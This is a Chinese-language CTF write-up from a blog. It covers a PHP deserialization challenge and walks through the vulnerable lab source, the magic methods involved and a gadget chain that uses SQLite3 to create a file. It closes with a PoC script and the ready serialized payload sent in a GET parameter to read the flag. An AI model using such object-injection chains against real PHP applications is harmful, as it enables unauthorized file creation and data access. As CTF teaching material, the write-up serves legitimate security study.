ctf-web-php序列化方向

已于 2022-06-17 15:30:05 修改
阅读量453 收藏 1
点赞数 1
分类专栏: ctf web 文章标签: php 数据库 开发语言
于 2022-06-06 20:48:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51768842/article/details/125153850
版权

“所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。”在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据库是“持久数据”,因此PHP序列化就是将内存的变量数据“保存”到文件中的持久数据的过程

php序列化

  1. 环境准备:

    1. phpstudy
    2. 源文件,源文件代码如下示

  1. 源码分析

<?php
highlight_file(__FILE__);
class wel{
    public $fast;
    public $star;
    public function  __construct()
    {
        $this->fast='free__toto';
        echo $this->fast;
        echo "what?";
    }
    public function  __destruct()
    {
        $content=$this->star;
        printf($content);
    }
    public function ctf()
    {
        echo 'welcome?';
    }

}
class  database{
    public $hostname='127.0.0.1';
    public $dbuser='root';
    public $dbpass='root';
    public $database;
    public $str;
    public $challange;
    public function __construct($database)
    {
        $this->database=$database;
    }
    public function __invoke()
    {
        function welcome(){
            echo 'do_it?';
        }
        $this->str->open($this->database);

    }

}
class flag{
    public $file;
    public $params;
    public function __construct()
    {
        $this->file=array();
    }
    public function __toString()
    {
        return $this->getfunction();
    }
    public function getfunction(){
        $func=$this->params;
        echo 'you win?';
        $func();
    }

}
$files=scandir('./');
foreach ($files as $file){
    if (is_file($file)){
        if ($file=='fl@g.php'){
            $con=file_get_contents('D:\phpstudy_pro\WWW\www.ctfweb01.com\flag.txt');
            echo $con;
            unlink($file);
        }
    }
}
$exp=$_GET['noway'];
unserialize($exp);
  • __construct() 构造函数-当对象实例化时调用构造函数
  • __destruct() 析构函数-当对象结束时调用析构函数
  • __toString() 当对象当作字符串输出时调用
  • __invoke() 当对象当作函数被调用时执行

poc构造链:wel--->__destruct()-->flag-->getfunation-->database-->invoke-->php类-->open-->fl@g.php-->file-get-content

poc文件

<?php

highlight_file(__FILE__);

class wel
{
    public $fast;
    public $star;

    public function __construct()
    {
        $this->fast = 'free__toto';
        echo $this->fast;
        echo "what?";
    }

    public function __destruct()
    {
        $content = $this->star;
        printf($content);
    }

    public function ctf()
    {
        echo 'welcome?';
    }

}

class  database
{
    public $hostname = '127.0.0.1';
    public $dbuser = 'root';
    public $dbpass = 'root';
    public $database;
    public $str;
    public $challange;

    public function __construct($database)
    {
        $this->database = $database;
    }

    public function __invoke()
    {
        function welcome()
        {
            echo 'do_it?';
        }

        $this->str->open($this->database);

    }

}

class flag
{
    public $file;
    public $params;

    public function __construct()
    {
        $this->file = array();
    }

    public function __toString()
    {
        return $this->getfunction();
    }

    public function getfunction()
    {
        $func = $this->params;
        echo 'you win?';
        $func();
    }

}

$w=new wel();
$w->star=new flag();
$w->star->params=new database('fl@g.php');
$w->star->params->str=new SQLite3('fl@g.php');
echo serialize($w);

 运行文件得到序列化后最好删除此次创建的fl@G.PHP文件

得到playload=O:3:"wel":2:{s:4:"fast";s:10:"free__toto";s:4:"star";O:4:"flag":2:{s:4:"file";a:0:{}s:6:"params";O:8:"database":6:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:8:"fl@g.php";s:3:"str";O:7:"SQLite3":0:{}s:9:"challange";N;}}}

打开ctf网页get方法传入noway=O:3:"wel":2:{s:4:"fast";s:10:"free__toto";s:4:"star";O:4:"flag":2:{s:4:"file";a:0:{}s:6:"params";O:8:"database":6:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:8:"fl@g.php";s:3:"str";O:7:"SQLite3":0:{}s:9:"challange";N;}}}

刷新两次,第一次加载会创建文件fl@g.php,第二次刷新才会去读文件

得到flag

行 待
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
php序列化 ctf,CTF-Web-PHP序列化
weixin_31940835的博客
03-27 452
概念解释PHP序列化漏洞又叫做 PHP 对象注入漏洞,我觉得这个表达很不直白,也不能说明根本的问题,不如我们叫他 PHP 对象的属性篡改漏洞好了(别说这是我说的~~)反序列化漏洞的成因在于代码中的 unserialize() 接收的参数可控,从上面的例子看,这个函数的参数是一个序列化的对象,而序列化的对象只含有对象的属性,那我们就要利用对对象属性的篡改实现最终的攻击。魔法方法construct...
CTF php 序列化,CTF-WEB: php序列化
weixin_30673759的博客
03-18 265
将 c2hpZWxkLmpwZw== base64解码为shield.jpg将index.php 进行base64编码为aW5kZXgucGhw,进行访问读取源码http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw右键打开查看源码:...
CTF-Web-PHP序列化
StormTechnology的博客
12-15 230
概念解释 PHP序列化漏洞又叫做 PHP 对象注入漏洞,我觉得这个表达很不直白,也不能说明根本的问题,不如我们叫他 PHP 对象的属性篡改漏洞好了(别说这是我说的~~) 反序列化漏洞的成因在于代码中的 unserialize() 接收的参数可控,从上面的例子看,这个函数的参数是一个序列化的对象,而序列化的对象只含有对象的属性,那我们就要利用对对象属性的篡改实现最终的攻击。 魔法方法...
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 1673
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
CTFshow-WEB入门-反序列化
feng的博客
02-14 5523
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
CTF-web_php_serialize反序列化
Be Smart
02-24 845
一.根据题目猜测和反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
CTF-反序列化
qq_61774705的博客
08-15 4353
序列化
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 1497
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 2612
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-WEB入门DOC-2019版1
08-03
CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony 胸腺 AngularJS Vue.js Python 工具 SSRF 旁路 本地曝光 远程曝光 元数据 CRLF注射 指纹图 XXE ...
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
CTF(Capture The Flag)竞赛中,编程者经常面临各种挑战,其中“反序列化”是一种常见的安全漏洞利用方式。第九题的标题暗示我们需要理解并利用PHP的反序列化机制来解决这个问题。PHP是一种广泛使用的服务器端...
PHP序列化漏洞详解.rar
02-07
PHP序列化与反序列化** - **序列化**:PHP序列化是将变量转换为字符串的过程,便于存储或传输。序列化的结果是一个包含了变量类型、值以及任何与之相关的复杂数据结构的信息的特殊格式字符串。 - **反序列化**:...
RCE和php文件上传
最新发布
m0_71332744的博客
07-30 702
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 211
【代码】53、PHP 实现归并排序。
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 375
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 986
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值